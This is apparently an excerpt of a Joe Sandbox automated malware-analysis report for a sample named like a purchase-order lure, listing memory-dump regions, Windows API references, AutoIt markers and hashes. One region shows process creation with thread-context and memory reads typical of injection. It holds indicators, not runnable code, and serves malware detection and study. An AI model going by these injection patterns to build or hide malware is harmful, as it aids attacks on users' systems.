                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID:
                          • API String ID: 1986988660-0
                          • Opcode ID: 567de959ed1cad6ce646918fb6a88a51eb16aee4cb34ee9932663c15c4becedd
                          • Instruction ID: 9d02bc860cd235ff8bfb6495dbe1d2b50f1d87199351251d2b73f8424ee82989
                          • Opcode Fuzzy Hash: 567de959ed1cad6ce646918fb6a88a51eb16aee4cb34ee9932663c15c4becedd
                          • Instruction Fuzzy Hash: 19716DB5A02208AFD784EFB9BD457553BE3BB89344358826BD40AC73A2EB384445FF51
                          APIs
                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00F0556D
                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00F0557D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 04c761c6103c5097f4cf87af5a643bc148e3e780bf6494a86b42480e98866646
                          • Instruction ID: feb271141d9a1ea0453d232691560d7f1647af6170c78fbda5f6c3a3516d27d4
                          • Opcode Fuzzy Hash: 04c761c6103c5097f4cf87af5a643bc148e3e780bf6494a86b42480e98866646
                          • Instruction Fuzzy Hash: 8D311E75A00609EBDB14CF28CC80BAAB7B5FB44714F188629E91597280D7B1FD94EF90
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00F385CC,?,00FC8CC8,0000000C), ref: 00F38704
                          • GetLastError.KERNEL32(?,00F385CC,?,00FC8CC8,0000000C), ref: 00F3870E
                          • __dosmaperr.LIBCMT ref: 00F38739
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                          • String ID:
                          • API String ID: 490808831-0
                          • Opcode ID: cf92479c57f8724df84733902a9950de761411a6ca685bff3ff5142a0bce332f
                          • Instruction ID: 498dee5beab3cbce2efe33a187ee8076839fbe6648b793653b43fd6d7d1ec16c
                          • Opcode Fuzzy Hash: cf92479c57f8724df84733902a9950de761411a6ca685bff3ff5142a0bce332f
                          • Instruction Fuzzy Hash: 0B012B33E0572416D6246334AD46B7E775A8BC2BF4F39011AF8198B1D2DEAD8C82B190
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00F72CD4,?,?,?,00000004,00000001), ref: 00F72FF2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F72CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F73006
                          • CloseHandle.KERNEL32(00000000,?,00F72CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F7300D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: d32fcc9a6ada8ce9e0fbd7e2975872330c08d7f24045d172ffe0c38cd4bf41f8
                          • Instruction ID: c3639689228565cd998dc8225e46f3d5203ec8ac087cfc1264a62cd1e7f6d35c
                          • Opcode Fuzzy Hash: d32fcc9a6ada8ce9e0fbd7e2975872330c08d7f24045d172ffe0c38cd4bf41f8
                          • Instruction Fuzzy Hash: 61E0863268021477E2301755BC0EF8B3A1CD786B75F104211F759750D046A1154162EC
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 00F117F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: CALL
                          • API String ID: 1385522511-4196123274
                          • Opcode ID: 0f582d9830e2f18ff00bc50e47b68e7892f64d56c9e451a1b746cb2c1d27366f
                          • Instruction ID: bdf823ec4f6073af97039700919181458730da79daff19024af50c2b52126257
                          • Opcode Fuzzy Hash: 0f582d9830e2f18ff00bc50e47b68e7892f64d56c9e451a1b746cb2c1d27366f
                          • Instruction Fuzzy Hash: D4229E716083019FC714DF14C890B6ABBF2BF85314F58891DFA968B3A1D735E885EB92
                          APIs
                          • _wcslen.LIBCMT ref: 00F76F6B
                            • Part of subcall function 00F04ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LibraryLoad_wcslen
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 3312870042-2806939583
                          • Opcode ID: 0980a102f61dfb32a4e7f3fe975b2cc2d62fa6d57c403562ffa82c78761c5e05
                          • Instruction ID: 342e7783a5862e5e227b7400ae17ffe7ffd96c86b871b3fc3e3865b20ee8001c
                          • Opcode Fuzzy Hash: 0980a102f61dfb32a4e7f3fe975b2cc2d62fa6d57c403562ffa82c78761c5e05
                          • Instruction Fuzzy Hash: 98B174715183018FCB14EF20CC919AEB7E5AF94310F44895DF49A972A2EB34ED49FB92
                          APIs
                          • GetOpenFileNameW.COMDLG32(?), ref: 00F42C8C
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F02DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F02DC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen
                          • String ID: X
                          • API String ID: 779396738-3081909835
                          • Opcode ID: 910fa07ef35dcd2be8d3c029c8e041de4403807c96a540e473bdaa80e4b21bd7
                          • Instruction ID: 5b14fa2ea7775bc7710fa1631ace704a803c33c7cc4e3018c789fcbc8585d78c
                          • Opcode Fuzzy Hash: 910fa07ef35dcd2be8d3c029c8e041de4403807c96a540e473bdaa80e4b21bd7
                          • Instruction Fuzzy Hash: 74219671A002589BDB45DF94CC49BEE7BFCAF49314F00405AE905E7282DBB85989AB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 50d2bd30853fb886446939a5aac28bebb68740f3552ba5f7155d8a329c144b04
                          • Instruction ID: 217a24ba877bdd7e2fed72f793c74e57ceba2ef175745ded3ead7aac6e486535
                          • Opcode Fuzzy Hash: 50d2bd30853fb886446939a5aac28bebb68740f3552ba5f7155d8a329c144b04
                          • Instruction Fuzzy Hash: DB01B5729442687EDF18C7A8CC56FEEBBF89B15311F04455AE192D2181E5B8E6089B60
                          APIs
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03908
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconNotifyShell_
                          • String ID:
                          • API String ID: 1144537725-0
                          • Opcode ID: 31306a3cd81295234f8153b6bec853207a40fae9631feb64df164b3fbc7a3042
                          • Instruction ID: e36ab1e32b93f662c72ec6595b248db070f23ea7e183667552a2ed313310b6dc
                          • Opcode Fuzzy Hash: 31306a3cd81295234f8153b6bec853207a40fae9631feb64df164b3fbc7a3042
                          • Instruction Fuzzy Hash: D631C171A053019FE320DF34D884797BBE8FB49318F00096EF99983280E771AA44EB92
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F05773
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F44052
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 838cfb3d3e7f4eba29e38012917e3e6ce1c0984af1fa87e335a6d148b8f57884
                          • Instruction ID: 0527afb0a9e57c999d3e876ffd6bb2b44063136b1ae4961586b3e812436db584
                          • Opcode Fuzzy Hash: 838cfb3d3e7f4eba29e38012917e3e6ce1c0984af1fa87e335a6d148b8f57884
                          • Instruction Fuzzy Hash: 69014031545229B6E7304A2ADC0EF977F98EF02BB0F148211BE9C6A1E0CBB45854FB94
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00F09879,?,?,?), ref: 00F06E33
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00F09879,?,?,?), ref: 00F06E69
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: 05df00a101c76fb60245493968c25940e04e62ed4017ef75847f68d4da106fc6
                          • Instruction ID: 6171ddb676ff430b29c4a18ea2feaca89259d93c03fdf51737eefb4e485d7c74
                          • Opcode Fuzzy Hash: 05df00a101c76fb60245493968c25940e04e62ed4017ef75847f68d4da106fc6
                          • Instruction Fuzzy Hash: D701DF713042047FEB186BA9DC0BF7F7AADDB85710F14003EF106DA1E1E9A0AC00A678
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 00F0BB4E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID:
                          • API String ID: 1385522511-0
                          • Opcode ID: 63c4f6233ab832e912bcbc02fb957a49d15a7391c5c2554ee78229994df7f36d
                          • Instruction ID: 3fb5f5d56e7a1cef965dc0a3c8edf3ffc428251902ffc557e715a51cd8c623f1
                          • Opcode Fuzzy Hash: 63c4f6233ab832e912bcbc02fb957a49d15a7391c5c2554ee78229994df7f36d
                          • Instruction Fuzzy Hash: 7D32A071E002099FDB24CF54C894BBAB7B6EF44310F188059EE15AB291DB78ED45FB91
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00EB1A5B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EB1AF1
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EB1B13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction ID: dfbc79f2dddc5e87904739ef0c8ad9d646e86e712537f935dc41870f8e3f6a84
                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction Fuzzy Hash: 7612CE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A
                          APIs
                            • Part of subcall function 00F04E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E9C
                            • Part of subcall function 00F04E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04EAE
                            • Part of subcall function 00F04E90: FreeLibrary.KERNEL32(00000000,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EC0
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EFD
                            • Part of subcall function 00F04E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E62
                            • Part of subcall function 00F04E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04E74
                            • Part of subcall function 00F04E59: FreeLibrary.KERNEL32(00000000,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E87
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$Load$AddressFreeProc
                          • String ID:
                          • API String ID: 2632591731-0
                          • Opcode ID: 8bc6ca053644bc9bf93a766866286b901c16179e62cf30dd08d171cd726ee4a8
                          • Instruction ID: 7c7d1ec17a21031c82c0c843eb3634cc5eef29a8416f7eb1a731fe6c57cf448b
                          • Opcode Fuzzy Hash: 8bc6ca053644bc9bf93a766866286b901c16179e62cf30dd08d171cd726ee4a8
                          • Instruction Fuzzy Hash: 8611E772610206AADF14BF60DD12FAD77A59F40B12F10842EF652AB1C1DEB8AA05BB50
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: 1e18a2b9edc48c0cdeb670b746ea615b9130aca2007611f250e01b80b1e78e43
                          • Instruction ID: b8e9f3207c1aa4f0996f117fb073d4856b53b7ba75fd4134319f4bc036589f0f
                          • Opcode Fuzzy Hash: 1e18a2b9edc48c0cdeb670b746ea615b9130aca2007611f250e01b80b1e78e43
                          • Instruction Fuzzy Hash: 8211187590420AAFCF15DF58E941ADA7BF5EF48314F104059FC08AB312DB35DA12DBA5
                          APIs
                          • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00F0543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00F09A9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 9397a959f7605656da2533850a785e79be8773e245eb3fd77cc3cb636bf58846
                          • Instruction ID: adbd6edc04b325e22b95a9fa6f5a03d6a7200481f1b64ad0beee761498ff0110
                          • Opcode Fuzzy Hash: 9397a959f7605656da2533850a785e79be8773e245eb3fd77cc3cb636bf58846
                          • Instruction Fuzzy Hash: B4114C312087059FD720CF05C880B66B7F9EF44764F10C42EE9AB87692D7B4A945EB60
                          APIs
                            • Part of subcall function 00F34C7D: RtlAllocateHeap.NTDLL(00000008,00F01129,00000000,?,00F32E29,00000001,00000364,?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?), ref: 00F34CBE
                          • _free.LIBCMT ref: 00F3506C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction ID: 0862d9cac7b5396ec9cc33d8a615e7b581675e2675f68ad7b4d4a233e24defe7
                          • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction Fuzzy Hash: 9E0126B26047056BE325CF69DC81A5AFBE8FBC9370F25051DE18483280EA31A805C6B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction ID: 46453740846e5b9efd0ed6eec93ead29d81b24071b1296fc5e09f1ffb0be9c88
                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction Fuzzy Hash: 2DF02832921A3497C7313A69FC15B5A3B9C9F52371F200725F420932D2DB7CE802BAA5
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,00F01129,00000000,?,00F32E29,00000001,00000364,?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?), ref: 00F34CBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 672514e515e81ed74d55b7adbed2407530e24129df2439c9c1814a2a55f50a2c
                          • Instruction ID: 1b3ebf4a3574422e746c252c104ab97f2589c9e3fa760cbe435c4db3c5174c22
                          • Opcode Fuzzy Hash: 672514e515e81ed74d55b7adbed2407530e24129df2439c9c1814a2a55f50a2c
                          • Instruction Fuzzy Hash: C8F0B432A02234A6DB215F62AC05B5A3788BF417F0F155122BC15AA191CA70FC0176F0
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
